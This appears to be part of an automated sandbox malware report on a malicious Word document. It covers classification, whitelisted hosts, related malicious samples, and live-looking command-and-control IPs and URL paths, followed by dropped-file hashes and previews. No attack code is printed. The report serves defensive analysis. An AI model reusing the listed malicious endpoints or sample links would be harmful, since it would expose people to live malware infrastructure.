                                                                                                                    Classification:mal100.troj.evad.winDOC@16/14@3/7
                                                                                                                    EGA Information:
                                                                                                                    • Successful, ratio: 66.7%
                                                                                                                    HDC Information:
                                                                                                                    • Successful, ratio: 99.9% (good quality ratio 95%)
                                                                                                                    • Quality average: 79.8%
                                                                                                                    • Quality standard deviation: 27.5%
                                                                                                                    HCA Information:
                                                                                                                    • Successful, ratio: 77%
                                                                                                                    • Number of executed functions: 48
                                                                                                                    • Number of non-executed functions: 23
                                                                                                                    Cookbook Comments:
                                                                                                                    • Adjust boot time
                                                                                                                    • Enable AMSI
                                                                                                                    • Found application associated with file extension: .doc
                                                                                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                    • Found warning dialog
                                                                                                                    • Click Ok
                                                                                                                    • Attach to Office via COM
                                                                                                                    • Scroll down
                                                                                                                    • Close Viewer
                                                                                                                    Warnings:
                                                                                                                    Show All
                                                                                                                    • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, wuapihost.exe
                                                                                                                    • Excluded IPs from analysis (whitelisted): 104.42.151.234, 52.109.76.68, 52.109.12.24, 104.43.193.48, 51.104.139.180, 92.122.213.194, 92.122.213.247, 52.155.217.156, 20.54.26.129, 8.248.141.254, 8.253.204.249, 8.241.122.254, 8.241.121.254, 8.241.122.126
                                                                                                                    • Excluded domains from analysis (whitelisted): displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, prod.configsvc1.live.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcolcus15.cloudapp.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, auto.au.download.windowsupdate.com.c.footprint.net, skypedataprdcolwus16.cloudapp.net, au-bg-shim.trafficmanager.net, europe.configsvc1.live.com.akadns.net
                                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 1320 because it is empty
                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                    Simulations

                                                                                                                    Behavior and APIs

                                                                                                                    TimeTypeDescription
                                                                                                                    23:25:14API Interceptor44x Sleep call for process: powershell.exe modified
                                                                                                                    23:25:44API Interceptor10x Sleep call for process: svchost.exe modified

                                                                                                                    Joe Sandbox View / Context

                                                                                                                    IPs

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                    194.209.195.106v22Pc0qA.doc.docGet hashmaliciousBrowse
                                                                                                                      2wUaqWdy.doc.docGet hashmaliciousBrowse
                                                                                                                        97.120.3.198EIS-120120 QZC-122220.docGet hashmaliciousBrowse
                                                                                                                        • 97.120.3.198/0f5m62spd/kt0d01/
                                                                                                                        Copy invoice #422380.docGet hashmaliciousBrowse
                                                                                                                        • 97.120.3.198/xzr508fg58hgt/p8q6sgg9gwgr8rs9/q9cynhg/8dxqwjpu230yl15/
                                                                                                                        9486874.docGet hashmaliciousBrowse
                                                                                                                        • 97.120.3.198/91y1l3z4v/xizwgksqrllsyqu/eraoyl9t2wlrof/g8pufykrilt/6brn7fffklsas/q3gkoa/
                                                                                                                        Electronic form.docGet hashmaliciousBrowse
                                                                                                                        • 97.120.3.198/w9v9j4zmq7bejeic2e/
                                                                                                                        TZ8322852306TL.docGet hashmaliciousBrowse
                                                                                                                        • 97.120.3.198/do8iadgzwnq3qa9povw/6zdyqngmhmmc69wdpj/
                                                                                                                        http://www.appdailyhunt.com/alfasymlink/O1m92JJ5CJWxojdaFgjPcIrL/Get hashmaliciousBrowse
                                                                                                                        • 97.120.3.198/uvn2j/un8q1/
                                                                                                                        http://www.appdailyhunt.com/alfasymlink/O1m92JJ5CJWxojdaFgjPcIrL/Get hashmaliciousBrowse
                                                                                                                        • 97.120.3.198/pos89yydi24uxtcmlz6/f631/8x9c2bk8t4r/zorb8/ogci/cggy1evlrwxdj5h/
                                                                                                                        https://dj.4zido.de/i/612BRNn/Get hashmaliciousBrowse
                                                                                                                        • 97.120.3.198/19kj6/g5h9bzym006c7j/43ay3ofpznbzj38/1qfz5tqd3/r5exfcpnarwn4c/6ne8dy3r0jelw2qnbi/
                                                                                                                        http://gluonpharma.com/fonts/W/Get hashmaliciousBrowse
                                                                                                                        • 97.120.3.198/ug9rsi0iq7da8qet86h/jg29c6vldf/6fyvceyue/sfz5vfi4e22/
                                                                                                                        35.208.182.43v22Pc0qA.doc.docGet hashmaliciousBrowse
                                                                                                                          2wUaqWdy.doc.docGet hashmaliciousBrowse
                                                                                                                            GT-9333 Medical report COVID-19.docGet hashmaliciousBrowse
                                                                                                                              70.180.33.2028wPRuahY1M.dllGet hashmaliciousBrowse
                                                                                                                              • 70.180.33.202/fln18ojo9upin4s/szxw2xk/75f0/0f66f0gsp71bm7w/
                                                                                                                              50.116.111.59Electronic form.docGet hashmaliciousBrowse
                                                                                                                              • 50.116.111.59:8080/p28e7od863phitwqz2s/7roopj5/r6b06xe3e8xmqs8g/9tmo0q2t/i21l8k4/mkj91zepqc0f7n/
                                                                                                                              8wPRuahY1M.dllGet hashmaliciousBrowse
                                                                                                                              • 50.116.111.59:8080/805kib7/vp5sm5n4p5u7ghz3w9/6ugmso/0sjuxpasi/
                                                                                                                              http://perfumeriarecuerdame.cl/overillustration/lTqyZy8AT7ByAidoAEArFkYch5nVjGFftnZdnv8yqAaPMnENN7URxUqiCu/Get hashmaliciousBrowse
                                                                                                                              • 50.116.111.59:8080/rd6gz9k388ltevf/r77na/ajzbauvcf2/x5jv1yqwmaas34s/
                                                                                                                              https://correolimpio.telefonica.es/atp/url-check.php?URL=https%3A%2F%2Fnhabeland.vn%2Fsercurirys%2FRbvPk%2F&D=53616c7465645f5f824c0b393b6f3e2d3c9a50d9826547979a4ceae42fdf4a21ec36a319de1437ef72976b2e7ef710bdb842a205880238cf08cf04b46eccce50114dbc4447f1aa62068b81b9d426da6b&V=1Get hashmaliciousBrowse
                                                                                                                              • 50.116.111.59:8080/unlfwwzvo3nu/
                                                                                                                              adjunto 86028707-97299.docGet hashmaliciousBrowse
                                                                                                                              • 50.116.111.59:8080/gtnp7ctfs63434f509u/vi5pbfhvcpzd6po6u/
                                                                                                                              DOCUMENTO_MEDICO 047.docGet hashmaliciousBrowse
                                                                                                                              • 50.116.111.59:8080/fxj03p8nb/8bxykfnpf63q35rwg/9i1xa3srvbcrspryp/3w4lfheoymirfym/bvyc6d78gbr8o/kb3s02ub1n7cf9/
                                                                                                                              December Invoice.docGet hashmaliciousBrowse
                                                                                                                              • 50.116.111.59:8080/n3wh7cs8bxi/ytxv0cfwhgz/jjzbhmo3jqx9/6wp9z8y66m/g2irzjj1b45ynawfgh/30hz8zv/
                                                                                                                              MH1809380042BB.docGet hashmaliciousBrowse
                                                                                                                              • 50.116.111.59:8080/1lgocese97nii3al1/vw784nlo3edogtw0m/vsmt1rb3x8n1evlo5/my0x/rds7y7hqjo/1n6ca1ys3f/
                                                                                                                              http://avanttipisos.com.br/catalogo-virtual/i1XnbBRzXXXrqGLfBZ3UNn6Yjh1mubdZKDm48wvQD3thzthxMysXGet hashmaliciousBrowse
                                                                                                                              • 50.116.111.59:8080/kno2cm5jwc6m/tgmjzmpq/4jdm7z5y9l1javlg/da51anu0oz08tnv458/nzrpbfoaduoh4bi/
                                                                                                                              Nf3m8s.dllGet hashmaliciousBrowse
                                                                                                                              • 50.116.111.59:8080/20c0m7wf00/
                                                                                                                              https://upinsmokebatonrouge.com/var/kZKk4S0XnGUwc0OKsia1/Get hashmaliciousBrowse
                                                                                                                              • 50.116.111.59:8080/q3ikxf8rlo0rwmkk/
                                                                                                                              GT-9333 Medical report COVID-19.docGet hashmaliciousBrowse
                                                                                                                              • 50.116.111.59:8080/zikye087/k6io5sui3jj27i90cer/zipbonjrmr/
                                                                                                                              2G18HC8998F36.docGet hashmaliciousBrowse
                                                                                                                              • 50.116.111.59:8080/f0ttde5p/6pa3fz7e/35ronnbuwllcs3rpomc/

                                                                                                                              Domains

                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                              physio-svdh.chv22Pc0qA.doc.docGet hashmaliciousBrowse
                                                                                                                              • 194.209.195.106
                                                                                                                              2wUaqWdy.doc.docGet hashmaliciousBrowse
                                                                                                                              • 194.209.195.106

                                                                                                                              ASN

                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                              SWISSCOMSwisscomSwitzerlandLtdCHv22Pc0qA.doc.docGet hashmaliciousBrowse
                                                                                                                              • 194.209.195.106
                                                                                                                              2wUaqWdy.doc.docGet hashmaliciousBrowse
                                                                                                                              • 194.209.195.106
                                                                                                                              SKM_C258201001130020005057.exeGet hashmaliciousBrowse
                                                                                                                              • 46.14.214.245
                                                                                                                              SKM_C258201001130020005057.exeGet hashmaliciousBrowse
                                                                                                                              • 46.14.214.245
                                                                                                                              Mozi.mGet hashmaliciousBrowse
                                                                                                                              • 178.194.165.28
                                                                                                                              NormhjTcQb.exeGet hashmaliciousBrowse
                                                                                                                              • 212.243.31.234
                                                                                                                              pty10Get hashmaliciousBrowse
                                                                                                                              • 217.193.254.91
                                                                                                                              Astra.x86Get hashmaliciousBrowse
                                                                                                                              • 85.0.156.99
                                                                                                                              https://aplusserve.com/wp-content/plugins/antara/failed/encr-p-t-e-d/?email=maggiemk.wong@juliusbaer.comGet hashmaliciousBrowse
                                                                                                                              • 193.223.56.121
                                                                                                                              AWD1-2001028L PI.exeGet hashmaliciousBrowse
                                                                                                                              • 194.209.228.166
                                                                                                                              SWIFT COPY (2).exeGet hashmaliciousBrowse
                                                                                                                              • 194.209.228.166
                                                                                                                              ipz.exeGet hashmaliciousBrowse
                                                                                                                              • 188.61.89.227
                                                                                                                              newageGet hashmaliciousBrowse
                                                                                                                              • 195.144.41.204
                                                                                                                              7v1ic5IS8IGet hashmaliciousBrowse
                                                                                                                              • 164.206.111.135
                                                                                                                              miori.x86Get hashmaliciousBrowse
                                                                                                                              • 178.196.83.123
                                                                                                                              UnHAnaAW.x86Get hashmaliciousBrowse
                                                                                                                              • 178.192.36.116
                                                                                                                              Mozi.aGet hashmaliciousBrowse
                                                                                                                              • 213.3.4.52
                                                                                                                              WE3A0yB3klGet hashmaliciousBrowse
                                                                                                                              • 85.1.224.116
                                                                                                                              IpvLye.arm7Get hashmaliciousBrowse
                                                                                                                              • 178.195.108.154
                                                                                                                              whoareyou.mipsGet hashmaliciousBrowse
                                                                                                                              • 178.198.75.41
                                                                                                                              GOOGLE-2USv22Pc0qA.doc.docGet hashmaliciousBrowse
                                                                                                                              • 35.208.153.170
                                                                                                                              2wUaqWdy.doc.docGet hashmaliciousBrowse
                                                                                                                              • 35.208.153.170
                                                                                                                              INFO_2020.docGet hashmaliciousBrowse
                                                                                                                              • 35.208.69.64
                                                                                                                              REMITTANCE ADVICE REF0000360261_PDF.xlsxGet hashmaliciousBrowse
                                                                                                                              • 35.214.170.96
                                                                                                                              gDvIZEJQF2.xlsGet hashmaliciousBrowse
                                                                                                                              • 35.214.243.127
                                                                                                                              68254_2001.docGet hashmaliciousBrowse
                                                                                                                              • 35.209.96.32
                                                                                                                              IMG-11862.docGet hashmaliciousBrowse
                                                                                                                              • 35.208.61.46
                                                                                                                              ARCHIVOFile-20-012021.docGet hashmaliciousBrowse
                                                                                                                              • 35.209.96.32
                                                                                                                              Calculation-380472272-01262021.xlsmGet hashmaliciousBrowse
                                                                                                                              • 35.208.103.169
                                                                                                                              453690-3012-QZS-9120501.docGet hashmaliciousBrowse
                                                                                                                              • 35.214.159.46
                                                                                                                              MPbBCArHPF.exeGet hashmaliciousBrowse
                                                                                                                              • 35.208.174.213
                                                                                                                              TBKK E12101010.xlsxGet hashmaliciousBrowse
                                                                                                                              • 35.208.174.213
                                                                                                                              ARCH-SO-930373.docGet hashmaliciousBrowse
                                                                                                                              • 35.209.96.32
                                                                                                                              Info_C_780929.docGet hashmaliciousBrowse
                                                                                                                              • 35.214.159.46
                                                                                                                              Factura.docGet hashmaliciousBrowse
                                                                                                                              • 35.209.114.34
                                                                                                                              DAT 30 122020 664_16167.docGet hashmaliciousBrowse
                                                                                                                              • 35.214.159.46
                                                                                                                              Beauftragung.docGet hashmaliciousBrowse
                                                                                                                              • 35.209.114.34
                                                                                                                              sample2.docGet hashmaliciousBrowse
                                                                                                                              • 35.214.199.246
                                                                                                                              55-2912.docGet hashmaliciousBrowse
                                                                                                                              • 35.209.78.196
                                                                                                                              DAT_G_0259067.docGet hashmaliciousBrowse
                                                                                                                              • 35.214.169.246
                                                                                                                              CENTURYLINK-US-LEGACY-QWESTUSdavay.exeGet hashmaliciousBrowse
                                                                                                                              • 174.18.23.49
                                                                                                                              oHqMFmPndx.exeGet hashmaliciousBrowse
                                                                                                                              • 67.232.238.125
                                                                                                                              mssecsvc.exeGet hashmaliciousBrowse
                                                                                                                              • 162.19.200.18
                                                                                                                              fil1Get hashmaliciousBrowse
                                                                                                                              • 184.6.30.51
                                                                                                                              8wPRuahY1M.dllGet hashmaliciousBrowse
                                                                                                                              • 97.120.3.198
                                                                                                                              iGet hashmaliciousBrowse
                                                                                                                              • 63.224.11.107
                                                                                                                              svchost.exeGet hashmaliciousBrowse
                                                                                                                              • 69.68.63.158
                                                                                                                              http://167.248.133.20Get hashmaliciousBrowse
                                                                                                                              • 167.248.133.20
                                                                                                                              EIS-120120 QZC-122220.docGet hashmaliciousBrowse
                                                                                                                              • 97.120.3.198
                                                                                                                              Copy invoice #422380.docGet hashmaliciousBrowse
                                                                                                                              • 97.120.3.198
                                                                                                                              9486874.docGet hashmaliciousBrowse
                                                                                                                              • 97.120.3.198
                                                                                                                              Electronic form.docGet hashmaliciousBrowse
                                                                                                                              • 97.120.3.198
                                                                                                                              TZ8322852306TL.docGet hashmaliciousBrowse
                                                                                                                              • 97.120.3.198
                                                                                                                              http://www.appdailyhunt.com/alfasymlink/O1m92JJ5CJWxojdaFgjPcIrL/Get hashmaliciousBrowse
                                                                                                                              • 97.120.3.198
                                                                                                                              http://www.appdailyhunt.com/alfasymlink/O1m92JJ5CJWxojdaFgjPcIrL/Get hashmaliciousBrowse
                                                                                                                              • 97.120.3.198
                                                                                                                              https://dj.4zido.de/i/612BRNn/Get hashmaliciousBrowse
                                                                                                                              • 97.120.3.198
                                                                                                                              http://gluonpharma.com/fonts/W/Get hashmaliciousBrowse
                                                                                                                              • 97.120.3.198
                                                                                                                              fdwv4hWF1M.exeGet hashmaliciousBrowse
                                                                                                                              • 75.162.127.230
                                                                                                                              bdOPjE89ck.dllGet hashmaliciousBrowse
                                                                                                                              • 72.165.68.237
                                                                                                                              http://167.248.133.24Get hashmaliciousBrowse
                                                                                                                              • 167.248.133.24

                                                                                                                              JA3 Fingerprints

                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                              3b5074b1b5d032e5620f69f9f700ff0eOOLU2115327710.xls.exeGet hashmaliciousBrowse
                                                                                                                              • 194.209.195.106
                                                                                                                              • 35.208.182.43
                                                                                                                              ITM inspection time change.exeGet hashmaliciousBrowse
                                                                                                                              • 194.209.195.106
                                                                                                                              • 35.208.182.43
                                                                                                                              shipping document.exeGet hashmaliciousBrowse
                                                                                                                              • 194.209.195.106
                                                                                                                              • 35.208.182.43
                                                                                                                              forderung.pdf.exeGet hashmaliciousBrowse
                                                                                                                              • 194.209.195.106
                                                                                                                              • 35.208.182.43
                                                                                                                              ROM_Files_939964.exeGet hashmaliciousBrowse
                                                                                                                              • 194.209.195.106
                                                                                                                              • 35.208.182.43
                                                                                                                              bLupWqls5l.exeGet hashmaliciousBrowse
                                                                                                                              • 194.209.195.106
                                                                                                                              • 35.208.182.43
                                                                                                                              Payment Receipt.exeGet hashmaliciousBrowse
                                                                                                                              • 194.209.195.106
                                                                                                                              • 35.208.182.43
                                                                                                                              UQtGj1Yzlf.exeGet hashmaliciousBrowse
                                                                                                                              • 194.209.195.106
                                                                                                                              • 35.208.182.43
                                                                                                                              INV-FACTUUR00921.xlsxGet hashmaliciousBrowse
                                                                                                                              • 194.209.195.106
                                                                                                                              • 35.208.182.43
                                                                                                                              6729001591617.exeGet hashmaliciousBrowse
                                                                                                                              • 194.209.195.106
                                                                                                                              • 35.208.182.43
                                                                                                                              tQdHht8Bwc.exeGet hashmaliciousBrowse
                                                                                                                              • 194.209.195.106
                                                                                                                              • 35.208.182.43
                                                                                                                              SecuriteInfo.com.Trojan.PackedNET.471.11170.exeGet hashmaliciousBrowse
                                                                                                                              • 194.209.195.106
                                                                                                                              • 35.208.182.43
                                                                                                                              ttrpym.exeGet hashmaliciousBrowse
                                                                                                                              • 194.209.195.106
                                                                                                                              • 35.208.182.43
                                                                                                                              roboforex4multisetup.exeGet hashmaliciousBrowse
                                                                                                                              • 194.209.195.106
                                                                                                                              • 35.208.182.43
                                                                                                                              MV TAN BINH 135.pdf.exeGet hashmaliciousBrowse
                                                                                                                              • 194.209.195.106
                                                                                                                              • 35.208.182.43
                                                                                                                              SecuriteInfo.com.Variant.Zusy.363976.7571.exeGet hashmaliciousBrowse
                                                                                                                              • 194.209.195.106
                                                                                                                              • 35.208.182.43
                                                                                                                              SecuriteInfo.com.Trojan.PackedNET.519.21836.exeGet hashmaliciousBrowse
                                                                                                                              • 194.209.195.106
                                                                                                                              • 35.208.182.43
                                                                                                                              RFQ RPM202011-776JD.jpg.lnkGet hashmaliciousBrowse
                                                                                                                              • 194.209.195.106
                                                                                                                              • 35.208.182.43
                                                                                                                              8Aobnx1VRi.exeGet hashmaliciousBrowse
                                                                                                                              • 194.209.195.106
                                                                                                                              • 35.208.182.43
                                                                                                                              RFQ-Strip Casting Line.exeGet hashmaliciousBrowse
                                                                                                                              • 194.209.195.106
                                                                                                                              • 35.208.182.43

                                                                                                                              Dropped Files

                                                                                                                              No context

                                                                                                                              Created / dropped Files

                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\DC97C0E2-E492-4CE8-9253-DB063F2B7EA0
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                              File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):132920
                                                                                                                              Entropy (8bit):5.373078821495444
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:1536:CcQceNqaBtA3gZw+pQ9DQW+zAUH34ZldpKWXboOilXPErLL8Eh:irQ9DQW+zBX8P
                                                                                                                              MD5:389C1461181EDC4905029C5E88D35AA2
                                                                                                                              SHA1:3E61E8C9A9739C2D53D7610C129047C5B332BBCC
                                                                                                                              SHA-256:C967124C561BD6E97DE925820D6CE8B20C64B913D1E343AEFB80FCD9EF96075A
                                                                                                                              SHA-512:74903A87EF4AB07D39F4E4DBCA642CEC14DDC9CA199A8559B710A55B10D0A92F6775202CF46E419213FE3B690CF660A5ADE38A5C1550410A5695112633E6D551
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-02-01T22:25:05">.. Build: 16.0.13731.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{179EC3B7-37E0-4560-80F5-16F3BFE059F5}.tmp
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1024
                                                                                                                              Entropy (8bit):0.05390218305374581
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:ol3lYdn:4Wn
                                                                                                                              MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                              SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                              SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                              SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                              Malicious:false
                                                                                                                              Reputation:high, very likely benign file
                                                                                                                              Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{87200191-4D4F-4DCD-B181-904D5E386871}.tmp
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1536
                                                                                                                              Entropy (8bit):1.3643824618899223
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:Iiiiiiiiii8l+4V/Nc8++ldL61DX6tD6pV2E6qn:23dNG+PmBqZ6pV2pq
                                                                                                                              MD5:9731171E08A44D90DD005A586825086B
                                                                                                                              SHA1:FB904928494B5B3FEA79A40B4A6CA2F819790C25
                                                                                                                              SHA-256:7C33C462A36BAAB96EB896B42428B656C709D767B9C870ED47A2191B2A4B663C
                                                                                                                              SHA-512:4E689228FB0305952F5B8C4835B6F8D00F831B192AED6FD2F8EA0A7C3AD569A98428C2D74B3A7CD02A3B5F468FA0DF1B8DECA4F1F36BB6D8C44590CF4C5C74D5
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview: ..(...(...(...(...(...(...(...(...(...(...(...p.r.a.t.e.s.h...p....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......>...B...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1196
                                                                                                                              Entropy (8bit):5.33361024576829
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:3aZPpQrLAo4KAxX5qRPD42HrCvKLoFe9tCKnKJF9iq:qZPerB4nqRL/HrCvjFe9tC4anv
                                                                                                                              MD5:3C95F06BAE25D8883754A9886A484998
                                                                                                                              SHA1:74684406A7FE82F6476D5D9C9AA63E075871A80E
                                                                                                                              SHA-256:9434B071A928518B9A14B79C07F4AD49F00E0E921C4FD868A4D8168E7ABFF938
                                                                                                                              SHA-512:32B51A03132B3CD0566A0B15A792C5E94729EB272238803B9E01A79487794FCB8B8EEE9F3284EDDE7AA4DE28F782DE6C5016E228DAD284E7F91F7D05AF6108DE
                                                                                                                              Malicious:false
                                                                                                                              Preview: @...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..<................):gK..G...$.1.q........System.Configuration4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.P................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                                                                              C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):170164
                                                                                                                              Entropy (8bit):4.358394535375791
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:1536:fr9jQo7LzolWWpFpKKHAeedydju4HTbTuo+o5aQxJudUl9yhQL3oKmmy:fr5g8WpFpKKHHedydFeo+oQLUlPoK0
                                                                                                                              MD5:0CC8870D67DEEB05578F8107F79C3BC3
                                                                                                                              SHA1:90F1F216A983DA75584021C20243330727655EC6
                                                                                                                              SHA-256:997EDB52D239ECE12D62E6D41DD120AA74B013E8624498E352DC71F1B66E73B6
                                                                                                                              SHA-512:A8EEB1CA5B68D2A634726238AFFE761BF9C072629B3317E45B0CDA6D022E3B85F8157A4414F5857AE02585D4D6AB8953068E7F182B20D44FCDA14D03CF608A0A
                                                                                                                              Malicious:false
                                                                                                                              Preview: MSFT................Q................................$......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8...8...9..l9...9..4:...:...:..`;...;..(<...<...<..T=...=...>...>...>..H?...?...@..t@...@..<A...A...B..hB.......l...B..........................$................................................ ...............................x...I..............T........................................... ...................................................
                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gbmhr0zq.ixu.psm1
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:very short file (no magic)
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1
                                                                                                                              Entropy (8bit):0.0
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:U:U
                                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                              Malicious:false
                                                                                                                              Preview: 1
                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zyrecgys.4kk.ps1
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:very short file (no magic)
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1
                                                                                                                              Entropy (8bit):0.0
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:U:U
                                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                              Malicious:false
                                                                                                                              Preview: 1
                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):74
                                                                                                                              Entropy (8bit):4.060710299033871
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:M1blG+kLtCLs+kLtCmX1blG+kLtCv:MrG+kLtys+kLtzG+kLts
                                                                                                                              MD5:D9D81D211C7D3FE392C07C615275BBC8
                                                                                                                              SHA1:D0AFA7424E42C91595D6AF3178CEB8118A742FC4
                                                                                                                              SHA-256:8CA00953A5C409D8B6B2344A7DCD452A1A25A1F94E1034B2504919FFD123A8EB
                                                                                                                              SHA-512:FC4541A6A37F0D5AB6861417F2B68131D9C0C9708F3D413353EF11E71A721AE00E1F78BB0C78CAE1FB16DDCE2F39F86C75D780A9FDA863AF28301064F9B1A65C
                                                                                                                              Malicious:false
